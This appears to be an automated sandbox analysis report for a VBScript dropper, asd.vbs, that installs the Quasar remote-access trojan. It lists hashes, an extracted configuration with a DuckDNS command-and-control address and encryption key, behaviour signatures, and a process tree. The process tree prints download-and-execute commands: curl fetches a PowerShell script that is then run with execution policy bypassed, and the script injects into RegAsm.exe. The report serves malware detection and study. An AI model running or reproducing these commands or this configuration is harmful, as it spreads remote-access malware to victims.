Analysis
-
max time kernel
36s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2023, 09:37
Static task
static1
Behavioral task
behavioral1
Sample
asd.vbs
Resource
win7-20221111-en
General
-
Target
asd.vbs
-
Size
484B
-
MD5
1663574ead24fc758c224a04057e9da3
-
SHA1
c2fb493d802d82d93cbb139ab3c3899c31a68bc4
-
SHA256
7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
-
SHA512
ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
-
encryption_key
B0326395AC2D48856CAE22978A087DF5DCF5816D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp family_quasar behavioral2/memory/1128-142-0x000000000047E7AE-mapping.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 api.ipify.org 31 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3384 set thread context of 1128 3384 powershell.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3384 powershell.exe 3384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3384 powershell.exe Token: SeDebugPrivilege 1128 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1128 RegAsm.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4956 wrote to memory of 4624 4956 WScript.exe 77 PID 4956 wrote to memory of 4624 4956 WScript.exe 77 PID 4624 wrote to memory of 2460 4624 cmd.exe 79 PID 4624 wrote to memory of 2460 4624 cmd.exe 79 PID 2460 wrote to memory of 628 2460 cmd.exe 80 PID 2460 wrote to memory of 628 2460 cmd.exe 80 PID 4956 wrote to memory of 2256 4956 WScript.exe 90 PID 4956 wrote to memory of 2256 4956 WScript.exe 90 PID 2256 wrote to memory of 5092 2256 cmd.exe 92 PID 2256 wrote to memory of 5092 2256 cmd.exe 92 PID 5092 wrote to memory of 3384 5092 cmd.exe 93 PID 5092 wrote to memory of 3384 5092 cmd.exe 93 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95 PID 3384 wrote to memory of 1128 3384 powershell.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\cmd.execmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\curl.execurl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵PID:628
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1128
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD57aad8bcb11ff3deab23cc311222fe265
SHA13d9a69c71e00aff947af949441220f18bad9e0d8
SHA256c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9